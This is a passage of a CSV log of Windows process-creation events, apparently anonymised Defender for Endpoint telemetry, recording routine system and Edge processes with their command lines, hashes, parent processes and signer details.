Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1333,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:11:00.410384900+00:00,5004,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:11:00.702637100+00:00,2021-06-24 02:13:07.852461600+00:00,f4ecce7a-224a-47f6-aaa5-236586927df2,computerpii_0a470890c60768167990033d701e7bd881398861,173039,False,10.7740.19041.1052,False,11540474045175158,,11540474045175942,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1334,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:11:44.493709200+00:00,20856,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320754_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320754 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:11:44.633285700+00:00,2021-06-24 02:13:07.852978600+00:00,3f4ea8d4-be1d-4bdf-a6ac-7ce80fad3e4a,computerpii_0a470890c60768167990033d701e7bd881398861,173054,False,10.7740.19041.1052,False,11540474045144190,,11540474045175945,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1335,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:12:33.182949300+00:00,18224,smartscreen.exe,smartscreen.exe -Embedding,PortableExecutable,2021-06-09 01:20:39.597351200+00:00,C:\Windows\System32\smartscreen.exe,2378752,521ed922765bca8f79bd76188f879311,9605680fc164acb985c031eca2c8bc4909cf8b749c571db6de2b0b2c204c2163,183e877f488f2df9f304f60a42514a334720399f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:12:33.994311+00:00,2021-06-24 02:13:07.853183500+00:00,87040f6e-c982-4f86-b2da-4e74ffdb1ea9,computerpii_0a470890c60768167990033d701e7bd881398861,173060,False,10.7740.19041.1052,False,11540474045136908,,11540474045175951,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1052,smartscreen.exe,smartscreen.exe,Windows Defender SmartScreen
+1336,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:18:56.847767500+00:00,5468,SenseCncProxy.exe,4812,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:18:56.861497+00:00,2021-06-24 01:19:26.495136800+00:00,67800dfc-59b5-48d8-b51d-1d5f2fe76252,computerpii_0a470890c60768167990033d701e7bd881398861,170404,False,10.7740.19041.1052,False,11540474045137006,,11540474045175563,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1337,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:45:48.991106100+00:00,7116,audiodg.exe,AUDIODG.EXE 0x320 0x494,PortableExecutable,2021-06-09 01:20:34.938090+00:00,C:\Windows\System32\audiodg.exe,585240,fdbb767a71f688e46b329072806eea51,be7b4d24854a80a2cb08f3f7e8c09e3b06c86b420dc867120306aaa6981a40cc,0c81cd20691e99a139c5c6d6e9e35936b0cb02b9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-10 00:46:11.367562+00:00,3752,svchost.exe,svchost.exe -k LocalServiceNetworkRestricted -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:45:49.006105600+00:00,2021-06-24 01:46:08.007163600+00:00,5472508b-7a90-463c-b405-c8dd3ea95181,computerpii_0a470890c60768167990033d701e7bd881398861,172433,False,10.7740.19041.1052,False,11540474045136968,,11540474045175826,2021-06-10 00:46:11.367562+00:00,3752,2021-06-10 00:46:11.367562+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3752,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,audioadg.exe,audioadg.exe,Windows Audio Device Graph Isolation
+1338,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:01:23.282176200+00:00,20124,SrTasks.exe,srtasks.exe ExecuteScheduledSPPCreation,PortableExecutable,2020-10-09 20:48:01.624525+00:00,C:\Windows\System32\SrTasks.exe,59392,2694d2d28c368b921686fe567bd319eb,40e27a9039a2e4a731ea6a74291840fb13c679a1e8ae5b523016aa15727d8a58,abe2f09702c05ffe19accd3f149c0fb1031aea2a,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:01:23.613345800+00:00,2021-06-23 04:02:36.794795800+00:00,a57b03ce-00b1-452a-a216-60d2cec8d617,computerpii_0a470890c60768167990033d701e7bd881398861,162312,False,10.7740.19041.1052,False,11540474045136925,,11540474045173310,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.84,srtasks,srtasks.exe,Microsoft® Windows System Protection background tasks.
+1339,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:01:23.297764900+00:00,18892,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,2694d2d28c368b921686fe567bd319eb,40e27a9039a2e4a731ea6a74291840fb13c679a1e8ae5b523016aa15727d8a58,abe2f09702c05ffe19accd3f149c0fb1031aea2a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:01:23.282176200+00:00,20124,SrTasks.exe,srtasks.exe ExecuteScheduledSPPCreation,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:01:23.613616900+00:00,2021-06-23 04:02:36.794831700+00:00,1903a30a-dd40-4ca4-908f-e226f4d2550d,computerpii_0a470890c60768167990033d701e7bd881398861,162313,False,10.7740.19041.1052,False,11540474045173310,,11540474045173311,2021-06-23 04:01:23.282176200+00:00,20124,2021-06-23 04:01:23.282176200+00:00,\Device\HarddiskVolume3\Windows\System32\SrTasks.exe,20124,128,ActiveProcessStartkey,C:\Windows\System32,59392,2024-08-06 08:17:24+00:00,2020-10-09 20:48:01.624525+00:00,2021-06-23 04:01:23.308548600+00:00,2020-10-09 20:48:01.624525+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.84,srtasks,srtasks.exe,Microsoft® Windows System Protection background tasks.,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1340,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:01:23.602523+00:00,16540,VSSVC.exe,vssvc.exe,PortableExecutable,2021-02-17 04:35:00.513797700+00:00,C:\Windows\System32\VSSVC.exe,1477120,aa98234c89499a69bd55c2dccc4bccc9,aed19ca1eedf716640faf70b1a4a10736c6c7ed0e2149c3d6caa4d5e6da8899a,c242eceb603d3c1701d46262fdaf169ea366f533,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:01:23.618075900+00:00,2021-06-23 04:02:36.794875600+00:00,aa41deba-6d95-4e01-8ad0-43b74fe45f3c,computerpii_0a470890c60768167990033d701e7bd881398861,162314,False,10.7740.19041.1052,False,11540474045136906,,11540474045173312,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,VSSVC.EXE,VSSVC.EXE,Microsoft® Volume Shadow Copy Service
+1341,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:38:02.466036500+00:00,15408,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe637_ Global\UsGthrCtrlFltPipeMssGthrPipe637 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:38:03.475349900+00:00,2021-06-23 01:40:20.112870400+00:00,3c58505e-9223-411a-9457-ce87cb3842c0,computerpii_0a470890c60768167990033d701e7bd881398861,158888,False,10.7740.19041.1052,False,11540474045144190,,11540474045172509,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1342,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:39:30.447529800+00:00,10568,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320638_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320638 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:39:31.271449100+00:00,2021-06-23 01:40:20.118533200+00:00,ee812495-3794-4f7f-a5a5-df140153b342,computerpii_0a470890c60768167990033d701e7bd881398861,158992,False,10.7740.19041.1052,False,11540474045144190,,11540474045172528,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1343,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:06:16.223215900+00:00,6000,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4368"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:06:17.220336500+00:00,2021-06-23 09:08:21.829983300+00:00,ac6b214b-07f8-42da-85a7-6256f0f511cb,computerpii_0a470890c60768167990033d701e7bd881398861,166009,False,10.7740.19041.1052,False,11540474045137006,,11540474045174564,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1344,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:06:26.365272100+00:00,17364,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'fbfc5539be8807216f736a52ee593d6803721374427cf7786b7abb40e4bc4bdd')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 09:06:16.223215900+00:00,6000,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4368"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:06:26.699909800+00:00,2021-06-23 09:08:21.830017400+00:00,cf9ec638-cd3a-4f8f-8143-9d70664d9fb3,computerpii_0a470890c60768167990033d701e7bd881398861,166010,False,10.7740.19041.1052,False,11540474045174564,,11540474045174565,2021-06-23 09:06:16.223215900+00:00,6000,2021-06-23 09:06:16.223215900+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,6000,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 